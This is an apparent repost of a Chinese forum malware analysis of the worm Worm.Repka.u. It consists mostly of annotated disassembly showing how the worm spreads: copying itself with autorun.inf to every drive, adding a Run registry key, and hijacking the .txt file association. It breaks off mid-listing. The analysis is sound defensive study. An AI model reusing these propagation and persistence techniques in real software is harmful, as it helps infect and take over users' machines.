[分析]Worm.Repka.u二次深度分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

2—(4—磺基苯偶氮)变色酸(SPADNS)的SERS,SERRS研究(Ⅰ)... 比特币价格突破10万美元！市值接近2个特斯拉，为何大涨？前景如何？... 航海及海运专业英语词汇(M1)... [分析]Worm.Repka.u二次深度分析-软件逆向-看雪-安全社区|安全招聘... 外媒：法国政府将于本周拍卖 611 个比特币，价值约 3490 万美元...

栏目分类

BOX中文网

热点资讯

BOX中文网你的位置：Mint Club中文网 > BOX中文网 > [分析]Worm.Repka.u二次深度分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[分析]Worm.Repka.u二次深度分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

发布日期：2025-01-04 16:41 点击次数：96

　　病毒名称：Worm.Repka.u 使用工具： OD,影子系统文章版本： 2.0 QQ号：464252600 作者：NONAME剑人组织：[CPU] 年龄：CRACKER里最小的:) --------------------------- 写这个2.0的目的是因为某某仙人说俺1.0的文章分析太水，看来只好重新分析了：） PS：那个1.0之所以太水是因为没装影子系统，不敢动态调试。这也许就是高手和菜鸟的区别吧（偶菜你高……）:P OK，闲话少说，分析分析：）我的文章主要都在注释里，所以大家仔细看原代码…… 首先加断点 bpx CreateFileA(抱歉，我记得我+的是这个断点) 00401850 /> \55 PUSH EBP ;//此段程序为病毒开始传染的过程…… 00401851 |. 8BEC MOV EBP,ESP 00401853 |. 81EC 70010000 SUB ESP,170 00401859 |. 53 PUSH EBX 0040185A |. 56 PUSH ESI 0040185B |. 57 PUSH EDI 0040185C |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170] 00401862 |. B9 5C000000 MOV ECX,5C 00401867 |. B8 CCCCCCCC MOV EAX,CCCCCCCC 0040186C |. F3:AB REP STOS DWORD PTR ES:[EDI] 0040186E |. 8BF4 MOV ESI,ESP 00401870 |. 68 00ED4200 PUSH reper.0042ED00 ; /pThreadId = reper.0042ED00 00401875 |. 6A 00 PUSH 0 ; |CreationFlags = 0 00401877 |. 6A 00 PUSH 0 ; |pThreadParm = NULL 00401879 |. 68 2D104000 PUSH reper.0040102D ; |ThreadFunction = reper.0040102D 0040187E |. 6A 00 PUSH 0 ; |StackSize = 0 00401880 |. 6A 00 PUSH 0 ; |pSecurity = NULL 00401882 |. FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread 00401888 |. 3BF4 CMP ESI,ESP 0040188A |. E8 514F0000 CALL reper.004067E0 0040188F |. A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX 00401894 |. C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4 0040189B |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63 0040189F |. 833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0 004018A6 |. 0F85 21020000 JNZ reper.00401ACD 004018AC |. 8BF4 MOV ESI,ESP 004018AE |. FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives 004018B4 |. 3BF4 CMP ESI,ESP 004018B6 |. E8 254F0000 CALL reper.004067E0 004018BB |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX 004018C1 |. C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0 004018CB |. EB 0F JMP SHORT reper.004018DC 004018CD |> 8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110] ; 把EBP-110的内存数据放到这里面 004018D3 |. 83C0 01 |ADD EAX,1 ; ASCII码+1，遍历各个盘符 004018D6 |. 8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX ; 再把遍历后的送回去 004018DC |> 83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20 ; 如果ASCII加的比20还大（一共就26个盘……看来把C盘放到Z盘比较妥当……） 004018E3 |. 0F8D 05010000 |JGE reper.004019EE ; 那么跳转，否则你就呆着吧！ 004018E9 |. 8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C] 004018EF |. 234D FC |AND ECX,DWORD PTR SS:[EBP-4] 004018F2 |. 85C9 |TEST ECX,ECX ; 看看这个盘符行不行 004018F4 |. 0F84 DE000000 |JE reper.004019D8 004018FA |. 68 DCA04200 |PUSH reper.0042A0DC ; /ASCII ":\reper.exe" //为什么要+":\"呢？是因为病毒遍历硬盘后可以直接"c"+":\reper.exe".... 004018FF |. 0FBE55 F8 |MOVSX EDX,BYTE PTR SS:[EBP-8] ; | 00401903 |. 52 |PUSH EDX ; |Arg3 00401904 |. 68 74A14200 |PUSH reper.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s" 00401909 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] ; | 0040190F |. 50 |PUSH EAX ; |Arg1 00401910 |. E8 EB4C0000 |CALL reper.00406600 ; \reper.00406600 00401915 |. 83C4 10 |ADD ESP,10 00401918 |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] 0040191E |. 51 |PUSH ECX ; 开始把原来的[EBP-110]和":\reper.exe"合起来了 0040191F |. E8 04F7FFFF |CALL reper.00401028 00401924 |. 83C4 04 |ADD ESP,4 00401927 |. 3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10] 0040192D |. 74 1E |JE SHORT reper.0040194D 0040192F |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108] 00401935 |. 52 |PUSH EDX 00401936 |. E8 D9F6FFFF |CALL reper.00401014 0040193B |. 83C4 04 |ADD ESP,4 0040193E |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] 00401944 |. 50 |PUSH EAX ; /Arg1 00401945 |. E8 C64F0000 |CALL reper.00406910 ; \reper.00406910 0040194A |. 83C4 04 |ADD ESP,4 0040194D |> 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] 00401953 |. 51 |PUSH ECX 00401954 |. E8 B1F6FFFF |CALL reper.0040100A 00401959 |. 83C4 04 |ADD ESP,4 0040195C |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108] 00401962 |. 52 |PUSH EDX 00401963 |. E8 A7F6FFFF |CALL reper.0040100F 00401968 |. 83C4 04 |ADD ESP,4 0040196B |. 68 6CA04200 |PUSH reper.0042A06C ; /Arg4 = 0042A06C ASCII ":\autorun.inf" 00401970 |. 0FBE45 F8 |MOVSX EAX,BYTE PTR SS:[EBP-8] ; //原理同上……变成AUTORUN.INF了 00401974 |. 50 |PUSH EAX ; |Arg3 00401975 |. 68 74A14200 |PUSH reper.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s" //这个参数高手指点一下 0040197A |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] ; | 00401980 |. 51 |PUSH ECX ; |Arg1 00401981 |. E8 7A4C0000 |CALL reper.00406600 ; \reper.00406600 00401986 |. 83C4 10 |ADD ESP,10 00401989 |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108] 0040198F |. 52 |PUSH EDX 00401990 |. E8 A2F6FFFF |CALL reper.00401037 00401995 |. 83C4 04 |ADD ESP,4 00401998 |. 85C0 |TEST EAX,EAX 0040199A |. 75 1E |JNZ SHORT reper.004019BA 0040199C |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] 004019A2 |. 50 |PUSH EAX 004019A3 |. E8 6CF6FFFF |CALL reper.00401014 004019A8 |. 83C4 04 |ADD ESP,4 004019AB |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] 004019B1 |. 51 |PUSH ECX ; /Arg1 004019B2 |. E8 594F0000 |CALL reper.00406910 ; \reper.00406910 004019B7 |. 83C4 04 |ADD ESP,4 004019BA |> 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108] 004019C0 |. 52 |PUSH EDX 004019C1 |. E8 3FF6FFFF |CALL reper.00401005 004019C6 |. 83C4 04 |ADD ESP,4 004019C9 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] 004019CF |. 50 |PUSH EAX 004019D0 |. E8 3AF6FFFF |CALL reper.0040100F 004019D5 |. 83C4 04 |ADD ESP,4 004019D8 |> 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4] 004019DB |. D1E1 |SHL ECX,1 004019DD |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX 004019E0 |. 8A55 F8 |MOV DL,BYTE PTR SS:[EBP-8] 004019E3 |. 80C2 01 |ADD DL,1 004019E6 |. 8855 F8 |MOV BYTE PTR SS:[EBP-8],DL 004019E9 |.^ E9 DFFEFFFF \JMP reper.004018CD 004019EE |> 68 44A14200 PUSH reper.0042A144 ; /ASCII "viewer.exe" //又要把自己放到C:\WINDOWS下，2000的同志福气了：） 004019F3 |. 68 F8EB4200 PUSH reper.0042EBF8 ; |Arg3 = 0042EBF8 ASCII "C:\windows\" 004019F8 |. 68 30A04200 PUSH reper.0042A030 ; |Arg2 = 0042A030 ASCII "%s%s" 004019FD |. 68 F8EA4200 PUSH reper.0042EAF8 ; |Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe" 00401A02 |. E8 F94B0000 CALL reper.00406600 ; \reper.00406600 00401A07 |. 83C4 10 ADD ESP,10 00401A0A |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe" 00401A0F |. E8 14F6FFFF CALL reper.00401028 00401A14 |. 83C4 04 ADD ESP,4 00401A17 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10] 00401A1D |. 74 1A JE SHORT reper.00401A39 ; 如果有文件的话就跳 00401A1F |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe" 00401A24 |. E8 EBF5FFFF CALL reper.00401014 00401A29 |. 83C4 04 ADD ESP,4 00401A2C |. 68 F8EA4200 PUSH reper.0042EAF8 ; /Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe" 00401A31 |. E8 DA4E0000 CALL reper.00406910 ; \reper.00406910 00401A36 |. 83C4 04 ADD ESP,4 00401A39 |> 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe" 00401A3E |. E8 C7F5FFFF CALL reper.0040100A 00401A43 |. 83C4 04 ADD ESP,4 00401A46 |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe" 不知道为什么要覆盖？ 00401A4B |. E8 C4F5FFFF CALL reper.00401014 00401A50 |. 83C4 04 ADD ESP,4 00401A53 |. 68 F8EB4200 PUSH reper.0042EBF8 ; /Arg3 = 0042EBF8 ASCII "C:\windows\" 00401A58 |. 68 2CA14200 PUSH reper.0042A12C ; |Arg2 = 0042A12C ASCII "%ssystem32\N0TEPAD.exe" //看好了，是%s和system32 00401A5D |. 68 F8E94200 PUSH reper.0042E9F8 ; |释放N0TEPAD（是N零TEPAD……） 00401A62 |. E8 994B0000 CALL reper.00406600 ; \reper.00406600 00401A67 |. 83C4 0C ADD ESP,0C 00401A6A |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" //改关联的初始化（即入栈。是栈吧？高手原谅我吧……） 00401A6F |. E8 B4F5FFFF CALL reper.00401028 00401A74 |. 83C4 04 ADD ESP,4 00401A77 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10] 00401A7D |. 74 1A JE SHORT reper.00401A99 00401A7F |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" 00401A84 |. E8 8BF5FFFF CALL reper.00401014 00401A89 |. 83C4 04 ADD ESP,4 00401A8C |. 68 F8E94200 PUSH reper.0042E9F8 ; /Arg1 = 0042E9F8 ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" 00401A91 |. E8 7A4E0000 CALL reper.00406910 ; \reper.00406910 00401A96 |. 83C4 04 ADD ESP,4 00401A99 |> 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" 00401A9E |. E8 67F5FFFF CALL reper.0040100A 00401AA3 |. 83C4 04 ADD ESP,4 00401AA6 |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" 00401AAB |. E8 64F5FFFF CALL reper.00401014 00401AB0 |. 83C4 04 ADD ESP,4 00401AB3 |. 68 50B34200 PUSH reper.0042B350 00401AB8 |. E8 4DF5FFFF CALL reper.0040100A 00401ABD |. 83C4 04 ADD ESP,4 00401AC0 |. 68 50B34200 PUSH reper.0042B350 00401AC5 |. E8 4AF5FFFF CALL reper.00401014 00401ACA |. 83C4 04 ADD ESP,4 00401ACD |> A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C] 00401AD2 |. 83C0 01 ADD EAX,1 00401AD5 |. A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX 00401ADA |. A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C] 00401ADF |. 99 CDQ 00401AE0 |. B9 05000000 MOV ECX,5 00401AE5 |. F7F9 IDIV ECX 00401AE7 |. 8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX 00401AED |. C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],reper.0042EAF>; ASCII "C:\windows\viewer.exe" 00401AF7 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B2E>; ASCII "Software\Microsoft\Windows\CurrentVersion\Run" 00401B01 |. 8BF4 MOV ESI,ESP ; 以上这几行说明病毒开始向注册表里添东西了 00401B03 |. 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118] 00401B09 |. 52 PUSH EDX ; /pHandle 00401B0A |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE 00401B0F |. 6A 00 PUSH 0 ; |Reserved = 0 00401B11 |. 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] ; | 00401B17 |. 50 PUSH EAX ; |Subkey 00401B18 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE 00401B1D |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA -- 加入的=PUSH 80000002(HKEY_LOCAL_MACHINE)+EAX(Software\Microsoft\Windows\CurrentVersion\Run),写操作 00401B23 |. 3BF4 CMP ESI,ESP 00401B25 |. E8 B64C0000 CALL reper.004067E0 00401B2A |. 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX 00401B30 |. 8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114] 00401B36 |. 51 PUSH ECX 00401B37 |. E8 C44B0000 CALL reper.00406700 00401B3C |. 83C4 04 ADD ESP,4 00401B3F |. 8BF4 MOV ESI,ESP ; 以下几步是确切地把病毒加载到注册表中，刚才是建，下面是改，写 00401B41 |. 50 PUSH EAX ; /BufSize 00401B42 |. 8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114] ; | 00401B48 |. 52 PUSH EDX ; |Buffer 00401B49 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ 00401B4B |. 6A 00 PUSH 0 ; |Reserved = 0 00401B4D |. 68 ACA04200 PUSH reper.0042A0AC ; |ValueName = "runreper" 抱歉，我对注册表不怎么敢兴趣，我想可能是项名为runreper,值为c:\windows\viewer.exe 00401B52 |. 8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118] ; | 00401B58 |. 50 PUSH EAX ; |hKey 00401B59 |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA 00401B5F |. 3BF4 CMP ESI,ESP 00401B61 |. E8 7A4C0000 CALL reper.004067E0 00401B66 |. 8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX 00401B6C |. 8BF4 MOV ESI,ESP 00401B6E |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] 00401B74 |. 51 PUSH ECX ; /hKey 00401B75 |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 00401B7B |. 3BF4 CMP ESI,ESP 00401B7D |. E8 5E4C0000 CALL reper.004067E0 ; 病毒耍阴！经过UE的确认，是N零TEPAD，这是在改关联！ 00401B82 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B33>; ASCII "txtfile\shell\open\command" 00401B8C |. C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],reper.0042E9F>; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1" 00401B96 |. 68 68A04200 PUSH reper.0042A068 ; ASCII " %1" 00401B9B |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128] 00401BA1 |. 52 PUSH EDX 00401BA2 |. E8 894C0000 CALL reper.00406830 00401BA7 |. 83C4 08 ADD ESP,8 00401BAA |. 8BF4 MOV ESI,ESP 00401BAC |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118] ; 改HEKY_CALSSES_BOOT\txtfile\shell\open\command 下的关联！ 00401BB2 |. 50 PUSH EAX ; /pHandle 00401BB3 |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE //写注册表 00401BB8 |. 6A 00 PUSH 0 ; |Reserved = 0 00401BBA |. 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] ; | 00401BC0 |. 51 PUSH ECX ; |Subkey 00401BC1 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT 00401BC6 |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA //打开注册表 00401BCC |. 3BF4 CMP ESI,ESP 00401BCE |. E8 0D4C0000 CALL reper.004067E0 00401BD3 |. 8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX 00401BD9 |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128] 00401BDF |. 52 PUSH EDX 00401BE0 |. E8 1B4B0000 CALL reper.00406700 00401BE5 |. 83C4 04 ADD ESP,4 00401BE8 |. 8BF4 MOV ESI,ESP 00401BEA |. 50 PUSH EAX ; /BufSize 00401BEB |. 8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128] ; | 00401BF1 |. 50 PUSH EAX ; |Buffer 00401BF2 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ 00401BF4 |. 6A 00 PUSH 0 ; |Reserved = 0 00401BF6 |. 6A 00 PUSH 0 ; |ValueName = NULL 00401BF8 |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] ; | 00401BFE |. 51 PUSH ECX ; |hKey 00401BFF |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA 00401C05 |. 3BF4 CMP ESI,ESP 00401C07 |. E8 D44B0000 CALL reper.004067E0 00401C0C |. 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 00401C12 |. 8BF4 MOV ESI,ESP 00401C14 |. 8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118] 00401C1A |. 52 PUSH EDX ; /hKey 00401C1B |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 00401C21 |. 3BF4 CMP ESI,ESP 00401C23 |. E8 B84B0000 CALL reper.004067E0 00401C28 |. 5F POP EDI 00401C29 |. 5E POP ESI 00401C2A |. 5B POP EBX 00401C2B |. 81C4 70010000 ADD ESP,170 00401C31 |. 3BEC CMP EBP,ESP 00401C33 |. E8 A84B0000 CALL reper.004067E0 00401C38 |. 8BE5 MOV ESP,EBP 00401C3A |. 5D POP EBP 00401C3B \. C2 1000 RETN 10 这段是上面释放AUTORUN时的跟踪 00401D40 > \55 PUSH EBP 00401D41 . 8BEC MOV EBP,ESP 00401D43 . 6A FF PUSH -1 00401D45 . 68 C9894100 PUSH reper.004189C9 ; SE 处理程序安装 00401D4A . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0] 00401D50 . 50 PUSH EAX 00401D51 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP 00401D58 . 81EC A4000000 SUB ESP,0A4 00401D5E . 53 PUSH EBX 00401D5F . 56 PUSH ESI 00401D60 . 57 PUSH EDI 00401D61 . 8DBD 50FFFFFF LEA EDI,DWORD PTR SS:[EBP-B0] 00401D67 . B9 29000000 MOV ECX,29 00401D6C . B8 CCCCCCCC MOV EAX,CCCCCCCC 00401D71 . F3:AB REP STOS DWORD PTR ES:[EDI] 00401D73 . 6A 01 PUSH 1 ; /Arg1 = 00000001 00401D75 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; | 00401D78 . E8 33080000 CALL reper.004025B0 ; \reper.004025B0 00401D7D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0 00401D84 . B9 06000000 MOV ECX,6 00401D89 . BE 7CA04200 MOV ESI,reper.0042A07C ; ASCII "[autorun] open=reper.exe" 00401D8E . 8D7D 90 LEA EDI,DWORD PTR SS:[EBP-70] 00401D91 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00401D93 . A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00401D94 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C] 00401D99 . 50 PUSH EAX ; /Arg3 => 000001A4 00401D9A . 6A 02 PUSH 2 ; |Arg2 = 00000002 00401D9C . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; | 00401D9F . 51 PUSH ECX ; |Arg1 00401DA0 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; | 00401DA3 . E8 180F0000 CALL reper.00402CC0 ; \reper.00402CC0 00401DA8 . 8D55 90 LEA EDX,DWORD PTR SS:[EBP-70] 00401DAB . 52 PUSH EDX ; /[autorun]open=reper.exe病毒自从上次跳到释放时，就到了这里 00401DAC . 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48] ; | 00401DAF . E8 0C120000 CALL reper.00402FC0 ; \reper.00402FC0 00401DB4 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] 00401DB7 . E8 840F0000 CALL reper.00402D40 00401DBC . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1 00401DC3 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] 00401DC6 . E8 67F2FFFF CALL reper.00401032 00401DCB . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00401DCE . 64:890D 00000>MOV DWORD PTR FS:[0],ECX 00401DD5 . 5F POP EDI 00401DD6 . 5E POP ESI 00401DD7 . 5B POP EBX 00401DD8 . 81C4 B0000000 ADD ESP,0B0 00401DDE . 3BEC CMP EBP,ESP 00401DE0 . E8 FB490000 CALL reper.004067E0 00401DE5 . 8BE5 MOV ESP,EBP 00401DE7 . 5D POP EBP 00401DE8 . C3 RETN 然后是释放本体 00401F15 . 68 E9894100 PUSH reper.004189E9 ; SE 处理程序安装 -- 病毒开始释放文件……; SE 处理程序安装 00401F1A . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0] 00401F20 . 50 PUSH EAX 00401F21 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP 00401F28 . 81EC 90000000 SUB ESP,90 00401F2E . 53 PUSH EBX 00401F2F . 56 PUSH ESI 00401F30 . 57 PUSH EDI 00401F31 . 8DBD 64FFFFFF LEA EDI,DWORD PTR SS:[EBP-9C] 00401F37 . B9 24000000 MOV ECX,24 00401F3C . B8 CCCCCCCC MOV EAX,CCCCCCCC 00401F41 . F3:AB REP STOS DWORD PTR ES:[EDI] 00401F43 . 6A 01 PUSH 1 ; /Arg1 = 00000001 00401F45 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; | 00401F48 . E8 63060000 CALL reper.004025B0 ; \reper.004025B0 00401F4D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0 00401F54 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C] 00401F59 . 50 PUSH EAX ; /Arg3 => 000001A4 00401F5A . 68 80000000 PUSH 80 ; |Arg2 = 00000080 00401F5F . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; | 00401F62 . 51 PUSH ECX ; |Arg1 00401F63 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; | 00401F66 . E8 550D0000 CALL reper.00402CC0 ; \reper.00402CC0 00401F6B . 6A 02 PUSH 2 ; /Arg2 = 00000002 00401F6D . 6A 00 PUSH 0 ; |Arg1 = 00000000 00401F6F . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; | 00401F72 . E8 49290000 CALL reper.004048C0 ; \reper.004048C0 00401F77 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] 00401F7A . E8 D1290000 CALL reper.00404950 00401F7F . 8945 A8 MOV DWORD PTR SS:[EBP-58],EAX 00401F82 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] 00401F85 . E8 B60D0000 CALL reper.00402D40 00401F8A . 8B55 A8 MOV EDX,DWORD PTR SS:[EBP-58] 00401F8D . 8955 A4 MOV DWORD PTR SS:[EBP-5C],EDX 00401F90 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1 00401F97 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] 00401F9A . E8 93F0FFFF CALL reper.00401032 00401F9F . 8B45 A4 MOV EAX,DWORD PTR SS:[EBP-5C] 00401FA2 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00401FA5 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX 00401FAC . 5F POP EDI 00401FAD . 5E POP ESI 00401FAE . 5B POP EBX 00401FAF . 81C4 9C000000 ADD ESP,9C 00401FB5 . 3BEC CMP EBP,ESP 00401FB7 . E8 24480000 CALL reper.004067E0 00401FBC . 8BE5 MOV ESP,EBP 00401FBE . 5D POP EBP 00401FBF . C3 RETN 释放毒气…… 00406910 /$ 55 PUSH EBP 00406911 |. 8BEC MOV EBP,ESP 00406913 |. 51 PUSH ECX 00406914 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00406917 |. 50 PUSH EAX ; /FileName //看看有没有AUTORUN.INF文件 00406918 |. FF15 50134300 CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA //把别人的AUTORUN给CUT掉 0040691E |. 85C0 TEST EAX,EAX 00406920 |. 75 0B JNZ SHORT reper.0040692D 00406922 |. FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError 00406928 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040692B |. EB 07 JMP SHORT reper.00406934 0040692D |> C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0 00406934 |> 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 00406938 |. 74 11 JE SHORT reper.0040694B 0040693A |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 0040693D |. 51 PUSH ECX ; /Arg1 0040693E |. E8 7D420000 CALL reper.0040ABC0 ; \reper.0040ABC0 00406943 |. 83C4 04 ADD ESP,4 00406946 |. 83C8 FF OR EAX,FFFFFFFF 00406949 |. EB 02 JMP SHORT reper.0040694D 0040694B |> 33C0 XOR EAX,EAX 0040694D |> 8BE5 MOV ESP,EBP 0040694F |. 5D POP EBP 00406950 \. C3 RETN 该AUTORUN倒霉了…… 00408897 |. FF15 84134300 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA //病毒开始向C盘发出AUTORUN的创建命令了 0040889D |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 004088A0 |. 837D FC FF CMP DWORD PTR SS:[EBP-4],-1 004088A4 |. 75 17 JNZ SHORT reper.004088BD 004088A6 |. FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError 004088AC |. 50 PUSH EAX ; /Arg1 004088AD |. E8 0E230000 CALL reper.0040ABC0 ; \reper.0040ABC0 004088B2 |. 83C4 04 ADD ESP,4 004088B5 |. 83C8 FF OR EAX,FFFFFFFF 004088B8 |. E9 AA010000 JMP reper.00408A67 004088BD |> 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004088C0 |. 50 PUSH EAX ; /hFile 004088C1 |. FF15 80134300 CALL DWORD PTR DS:[<&KERNEL32.GetFileTyp>; \开始改病毒的属性…… 004088C7 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004088CA |. 837D F4 00 CMP DWORD PTR SS:[EBP-C],0 004088CE |. 75 21 JNZ SHORT reper.004088F1 004088D0 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004088D3 |. 51 PUSH ECX ; /hObject 上段是病毒杀AUTORUN的代码 00413994 > /8BF4 MOV ESI,ESP ; 手头没有API大全，不知道下面什么意思。所以把代码发上来 00413996 . |6A 00 PUSH 0 ; /MsgFilterMax = 0 00413998 . |6A 00 PUSH 0 ; |MsgFilterMin = 0 0041399A . |6A 00 PUSH 0 ; |hWnd = NULL 0041399C . |8D8D 7CFBFFFF LEA ECX,DWORD PTR SS:[EBP-484] ; | 004139A2 . |51 PUSH ECX ; |pMsg 004139A3 . |FF15 68144300 CALL DWORD PTR DS:[<&USER32.GetMessageA>>; \GetMessageA 004139A9 . |3BF4 CMP ESI,ESP ; 我估计现在病毒开始搞破坏了 004139AB . |E8 302EFFFF CALL reper.004067E0 ; 经过我的分析判断，这是在枚举进程！看看有没有对他有威胁的 004139B0 . |85C0 TEST 